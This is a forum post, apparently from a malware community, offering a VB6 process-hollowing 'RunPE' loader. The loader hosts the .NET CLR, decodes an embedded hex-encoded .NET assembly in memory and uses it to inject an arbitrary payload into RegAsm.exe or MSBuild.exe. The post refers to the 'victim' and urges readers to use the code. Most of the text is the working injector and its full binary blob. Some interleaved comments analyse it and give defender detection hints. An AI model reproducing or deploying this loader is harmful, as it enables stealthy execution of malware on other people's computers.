
Visual Basic VB6 CLR RunPE x86 / Native & .NET


.:Anony:.

Hello friends🙂

I took a C# RunPE and ported it to VB6 by hosting the Common Language Runtime (CLR).

So let's get started

For RunPE to work we need .NET Framework 2.0, and we need to add two type-library references to our project under References:

Code:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.tlb
Just stipulate that the work of the victim on the computer is not as it will not affect, now Net Framework is part of windows, it is in our hands

Now you can use this RunPE

'''''''' RunPE .net CLR '''''''''
'''''''' By MR. MORFEY ''''''''''
''' My Telegram: M0RF3Y0x1337 '''

' Win32/runtime imports used by RunPE below (analysis notes).
' DispCallFunc (oleaut32): invokes a COM interface method by its byte offset in
' the object's vtable, with the argument types and values supplied as raw arrays.
Private Declare Function DispCallFunc Lib "oleaut32" (ByVal pv As Long, ByVal ov As Long, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As Long, ByRef par As Variant) As Long
' RtlMoveMemory (kernel32): untyped memory copy; used below to read and write
' 4-byte pointers directly, so the code is 32-bit only.
Private Declare Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As Long)
' VarPtr from the VB6 runtime, re-declared to accept an array so that the address
' of the array variable (which holds the SAFEARRAY pointer) can be taken.
Private Declare Function VarPtrArray Lib "msvbvm60" Alias "VarPtr" (ByRef Ptr() As Any) As Long

' RunPE (analysis notes): starts the .NET CLR inside the current VB6 process,
' takes the default AppDomain, loads a .NET assembly that is embedded below as
' hex text, and calls that assembly's RunPE.Load method.
'   Arg     - passed unchanged to RunPE.Load on the last line of the function.
'   PayLoad - byte array passed unchanged to the same call; this function never
'             inspects or validates it.
' Nothing is assigned to the function name, so the caller gets an empty Variant.
Public Function RunPE(Arg As String, PayLoad() As Byte)
' In-process CLR hosting through the mscoree type library.
' Defender note: a native VB6 image that loads mscoree.dll and the v2.0.50727
' runtime is unusual, which makes the image-load event a useful detection point.
' The 2.0 CLR ships with .NET Framework 3.5, an optional feature on current
' Windows releases; leaving it disabled where it is not needed removes the
' runtime this code depends on.
Dim host As New mscoree.CorRuntimeHost, dom As AppDomain
host.Start
host.GetDefaultDomain dom
' An MSXML element typed "bin.hex" is used only as a hex-text-to-bytes decoder.
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.hex"
Dim bytes() As Byte
' The ShellCode string built on the following lines is not raw shellcode: it is
' the hex text of a complete PE file (it begins 4D5A, "MZ"), a managed DLL that
' imports _CorDllMain from mscoree.dll.
' Static indicators readable in the hex: the API names CreateProcess,
' NtUnmapViewOfSection, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory,
' GetThreadContext/SetThreadContext (plus the Wow64 variants) and ResumeThread,
' i.e. the process-hollowing API set; the type name RunPE; and the PDB path
' D:\Class\bin\Debug\Dotfuscated\Class.pdb.
ShellCode = ShellCode & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005045"
ShellCode = ShellCode & "00004C010300997BD95D0000000000000000E00022210B010B000014000000060000000000008E32000000200000000000000000400000200000000200000400000000000000040000000000000000800000000200000000000003004085000010000010000000001000001000000000000010000000000000000000000034320000"
ShellCode = ShellCode & "57000000004000005803000000000000000000000000000000000000006000000C000000D43100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000941200000020"
ShellCode = ShellCode & "00000014000000020000000000000000000000000000200000602E7273726300000058030000004000000004000000160000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001A000000000000000000000000000040000042000000000000000000000000000000007032000000000000"
ShellCode = ShellCode & "4800000002000500EC230000E80D000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001330020015000000000000000225280100000A037D0100000402047D020000042A000000133001000700000000000000027B010000042A001330"
ShellCode = ShellCode & "01000700000000000000027B020000042A7E7201000070280500000A720F00007003280600000A040517280F000006262A00133004001B00000001000011170A2B110203040528100000062C02172A0617580A061B31EB162A001B300A00D502000002000011160A725900007002280700000A0B1202FE15050000021203FE150400"
ShellCode = ShellCode & "00021202D005000002280800000A280900000A280A00000A7D0700000403280B00000A2D0D07726700007003280600000A0B02077E0C00000A7E0C00000A1620040000087E0C00000A141202120328040000062D06730D00000A7A041F3C280E00000A13040411041F3458280E00000A130520B30000008D11000001130611061620"
ShellCode = ShellCode & "020001009E280F00000A1A3315097B04000004110628050000062D1B730D00000A7A097B04000004110628060000062D06730D00000A7A11061F29941307161308097B0300000411071E5812081A120028090000062D06730D00000A7A110511083315097B030000041108280B0000062C06730D00000A7A0411041F5058280E0000"
ShellCode = ShellCode & "0A13090411041F5458280E00000A130A16130B097B030000041105110920003000001F40280C000006130C052D1E110C2D1A17130B097B0300000416110920003000001F40280C000006130C110C2D06730D00000A7A097B03000004110C04110A1200280A0000062D06730D00000A7A110420F800000058130D0411041C58281000"
ShellCode = ShellCode & "000A130E1613112B7004110D1F0C58280E00000A131204110D1F1058280E00000A131304110D1F1458280E00000A131411132C3811138D12000001131504111411151611158E69281100000A097B03000004110C111258111511158E691200280A0000062D06730D00000A7A110D1F2858130D1111175813111111110E328A110C28"
ShellCode = ShellCode & "1200000A130F097B0300000411071E58110F1A1200280A0000062D06730D00000A7A0411041F2858280E00000A1310110B2C041105130C11061F2C110C1110589E280F00000A1A3315097B04000004110628070000062D1B730D00000A7A097B04000004110628080000062D06730D00000A7A097B04000004280D00000615330673"
ShellCode = ShellCode & "0D00000A7ADE2326097B05000004281300000A281400000A131611162C0711166F1500000A161317DE02172A11172A000000411C0000000000003900000074020000AD02000023000000050000011E02281600000A2A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000002C060000237E0000"
ShellCode = ShellCode & "98060000D004000023537472696E677300000000680B00006C00000023555300D40B0000100000002347554944000000E40B00000402000023426C6F62000000000000000200000057B5A2150902000000FA01330016C4000100000022000000050000000F0000001100000031000000220000001A00000001000000020000000200"
ShellCode = ShellCode & "0000010000000200000002000000020000000A0000000100000002000000020000000000E80201000000000006009002F70206002A016C030600FE00F7020600DF03F7020600FE03F70206006902AF0406000504F7020600B302F7020A00D70359030600EB00F7020600BD00F7020600C9026C0306001104F70206005203F7020600"
ShellCode = ShellCode & "2503F70206003F03F70206001A00F70206009A02F70206003803F70206007A04F7020600E100F7020600DE018B0306004B028B0306003E0113030600FE0113030600170213030600AC01130306007001130306003202130306008D0113030600550113030600F0006C030600160159038700AB030000000000004800000000000100"
ShellCode = ShellCode & "010001011000C901000005000100010001001000550000001500030004000B011000600000005500030012000B0110006B000000550007001200010060000A00010072000D0006006000EB0006006B00EB00060072001C01060099001C01060060001C0106006B000A00060072000A00060099000A000610A8021F010600B102EB00"
ShellCode = ShellCode & "0600BE02EB000600C502EB000600C702EB0050200000000086184C0314000100742000000000860060001A000300882000000000860072001E0003000000000080009160C9034400030000000000800091602F045B000D00000000008000916019045B000F00000000008000916056045B001100000000008000916040045B001300"
ShellCode = ShellCode & "00000000800091608A046200150000000000800091609C046D001A000000000080009160FE0278001F00000000008000916067047E00210000000000800091608300870026009B20000000008600900098002700BC200000000096002F03A4002A00E4200000000091006000A4002E00E4230000000086184C031000320000000100"
ShellCode = ShellCode & "6000000002007200000001000100000002000500000003002000000004002400000005002800000006002C00000007003800000008003C0000000900400000000A0044000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000"
ShellCode = ShellCode & "03002000000004002400000005002800000001000100000002000500000003002000000004002400000005002800000001000100000002000500000001000100000002000500000003002000000004002400000005002800000001000100000001006D0000000200BA0200000300760400000100C002000002009500000003005B00"
ShellCode = ShellCode & "00000400B20000000100010000000200050000000300200000000400240009004C03100011004C032A0019004C03350031004C03100039009B008C004100F00391004100F703CE005100CF00D4006100AA02DB0069000900E1004100BF04E60071003303EB0079004C03100081001200EE0071009F02F50081003000F90099008004"
ShellCode = ShellCode & "00018100BA030B016900120011014900740016014900F202100029004C031000B1004C032601B9004C031000C1004C035301C9004C035301D1004C035301D9004C035301E1004C035301E9004C035301F1004C035301F9004C03530101014C03530109014C03D5012E000B01AB012E001300A5012E0003012F002E00FB002F002E00"
ShellCode = ShellCode & "F3002F002E00EB0098012E00E3002F002E00DB0080012E00D30058012E000A0063012E00CB0058012E001301DC012E00C30034012E00BB002B0143001B003B00430013002F00800023005600A00023005600C00023005600E00023005600000123005600200123005600400123005600600123005600800123005600A00123005600"
ShellCode = ShellCode & "1600230101000000000004000100000000000500A000AD0002000100000051002200000053002600020002000300020003000500D102DE0204010900C903010000010B002F04010000010D001904010000010F00560401000001110040040100000113008A040100000115009C04010000011700FE02020000011900670401000001"
ShellCode = ShellCode & "1B0083000100048000000100000000000000000000000000C303000002000000000000000000000001006200000000000200000000000000000000000100F702000000000400030005000300000000000000000000415F3000415F3100546F55496E74333200546F496E74333200496E74333200415F3200415F3300415F3400415F"
ShellCode = ShellCode & "3500546F496E74313600415F3600415F3700415F3800415F39003C4D6F64756C653E004100430052756E504500646174610061006D73636F726C696200620070726F6300630047657450726F636573734279496400526573756D65546872656164004C6F616400636D64006400476574456E7669726F6E6D656E745661726961626C"
ShellCode = ShellCode & "6500636F6D70617469626C650052756E74696D655479706548616E646C65004765745479706546726F6D48616E646C650056616C756554797065005479706500477569644174747269627574650041747472696275746555736167654174747269627574650044656275676761626C6541747472696275746500436F6D5669736962"
ShellCode = ShellCode & "6C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C79"
ShellCode = ShellCode & "4465736372697074696F6E41747472696275746500446F746675736361746F7241747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F707972696768744174747269627574650041737365"
ShellCode = ShellCode & "6D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465005375707072657373556E6D616E61676564436F64655365637572697479417474726962757465004174747269627574650042797465006765745F53697A6500650053697A654F66006600537472696E"
ShellCode = ShellCode & "67004172670067007061746800680069004D61727368616C006B65726E656C33322E646C6C006E74646C6C2E646C6C00436C6173732E646C6C004B696C6C0053797374656D004E74556E6D6170566965774F6653656374696F6E0053797374656D2E5265666C656374696F6E00457863657074696F6E0052756E005A65726F004275"
ShellCode = ShellCode & "6666657200426974436F6E766572746572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F646573004765"
ShellCode = ShellCode & "74427974657300436C6173730043726561746550726F636573730050726F63657373004174747269627574655461726765747300436F6E63617400466F726D6174004F626A65637400456E7669726F6E6D656E7400436F6E7665727400576F773634476574546872656164436F6E7465787400476574546872656164436F6E746578"
ShellCode = ShellCode & "7400576F773634536574546872656164436F6E7465787400536574546872656164436F6E74657874005669727475616C416C6C6F6345780070617900417272617900426C6F636B436F7079005265616450726F636573734D656D6F727900577269746550726F636573734D656D6F72790053797374656D2E53656375726974790049"
ShellCode = ShellCode & "734E756C6C4F72456D70747900000000000D570069006E0044006900720000495C004D006900630072006F0073006F00660074002E004E00450054005C004600720061006D00650077006F0072006B005C00760032002E0030002E00350030003700320037005C00000D200022007B0030007D0022000003200000005C34360349F5"
ShellCode = ShellCode & "EE4AAE76F941D7E8422B0008B77A5C561934E08902060E02060803200001052002010E080320000E032000080328000E03280008042001010205010000000005200101111108010001000000000011000A020E0E18180209180E101114101110040100000006000202181D080A000502180810080810080A00050218081D05081008"
ShellCode = ShellCode & "05000208180808000508180808080804000108180400010E0E0600030E0E0E0E072003010E0E1D0503070108080004020E0E1D0502200718080E1114111008081D0808080808020808061D0508080808081D051225020500020E0E1C0600011229112D0500010812290400010908040001020E020618060002081D05080300000806"
ShellCode = ShellCode & "0002061D05080A000501125108125108080500011D0508040001080905000112250802060903061D05021E2404200101080801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301042001010E0A010005436C61737300001C0100133030303A303A303A352E34322E302E393531340000"
ShellCode = ShellCode & "0000000017010012436F7079726967687420C2A920203230313900000C010007312E302E302E3000000501000100002901002431393661366538342D383337652D346236342D623964362D6462626132353839343764330000062001011180890801000200000000001C012D405E5F606B626D646F6B656C6B686B6A767370744142"
ShellCode = ShellCode & "43444546000000000000997BD95D000000000200000041000000F0310000F01300005253445369C8DB59B1CE1947866EE477F8F0230201000000443A5C436C6173735C62696E5C44656275675C446F7466757363617465645C436C6173732E706462000000005C32000000000000000000007E320000002000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000703200000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000FC0200000000000000000000"
ShellCode = ShellCode & "FC0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0000000000240004000000"
ShellCode = ShellCode & "5400720061006E0073006C006100740069006F006E00000000000000B0045C020000010053007400720069006E006700460069006C00650049006E0066006F0000003802000001003000300030003000300034006200300000001A000100010043006F006D006D0065006E007400730000000000000022000100010043006F006D00"
ShellCode = ShellCode & "700061006E0079004E0061006D0065000000000000000000340006000100460069006C0065004400650073006300720069007000740069006F006E000000000043006C006100730073000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000034000A000100"
ShellCode = ShellCode & "49006E007400650072006E0061006C004E0061006D006500000043006C006100730073002E0064006C006C0000004800120001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000A90020002000320030003100390000002A00010001004C0065006700"
ShellCode = ShellCode & "61006C00540072006100640065006D00610072006B00730000000000000000003C000A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043006C006100730073002E0064006C006C0000002C0006000100500072006F0064007500630074004E0061006D0065000000000043006C006100"
ShellCode = ShellCode & "730073000000340008000100500072006F006400750063007400560065007200730069006F006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "0000000000000000000000000000000000000000000000000000003000000C000000903200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000000000000000"
' Decode the accumulated hex text into a Byte array through the bin.hex element.
' The assembly exists only in memory; it is never written to disk as a file.
EL.Text = ShellCode
bytes = EL.NodeTypedValue
' Hand-built argument descriptors for DispCallFunc: one VARTYPE and one
' pointer-to-Variant per argument.
Dim vTypes(0 To 1) As Integer
Dim vValues(0 To 1) As Long
' Read the 4-byte SAFEARRAY pointer stored in the "bytes" array variable.
Dim pPArry As Long: pPArry = VarPtrArray(bytes)
Dim pArry As Long
RtlMoveMemory pArry, ByVal pPArry, 4
Dim vWrap: vWrap = pArry
vValues(0) = VarPtr(vWrap)
' 16411 = &H401B = VT_BYREF Or VT_SAFEARRAY: argument 0 is the byte array.
vTypes(0) = 16411
' pRef is the out slot that receives the result of the call.
Dim pRef As Long: pRef = 0
Dim vWrap2: vWrap2 = VarPtr(pRef)
vValues(1) = VarPtr(vWrap2)
' 16396 = &H400C = VT_BYREF Or VT_VARIANT: argument 1 is the out slot.
vTypes(1) = 16396
' Calls the method at byte offset 45 * 4 in dom's vtable with calling convention
' 4 (CC_STDCALL), return type vbLong and 2 arguments. The Long result is discarded.
' NOTE(review): presumably this slot is the AppDomain Load overload that takes a
' raw byte array; confirm against the mscorlib type library.
Call DispCallFunc(ObjPtr(dom), 45 * 4, 4, vbLong, 2, vTypes(0), vValues(0), 0)
' Copy the pointer written to pRef into a typed Assembly reference.
Dim aRef As mscorlib.Assembly
RtlMoveMemory aRef, pRef, 4
' Create the type named "RunPE" from the loaded assembly and call its Load method
' with the host image name, the command-line argument and the payload bytes.
' Defender note: strings in the embedded assembly (WinDir,
' \Microsoft.NET\Framework\v2.0.50727\) and the post text indicate the host image
' is taken from that framework directory. The behaviour to look for is RegAsm.exe
' (or another binary from that directory) started by a non-developer parent
' process, followed by cross-process memory writes and a thread-context change
' before the thread is resumed.
aRef.CreateInstance("RunPE").Load "RegAsm.exe", Arg, PayLoad
End Function


Let me tell you about the parameters

You can pass arguments to the process

Injection by Default occurs in "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe", you can use another process from this directory, for example MSBuild.exe

I hope that you would understand everything, now I wish you good luck 👋

 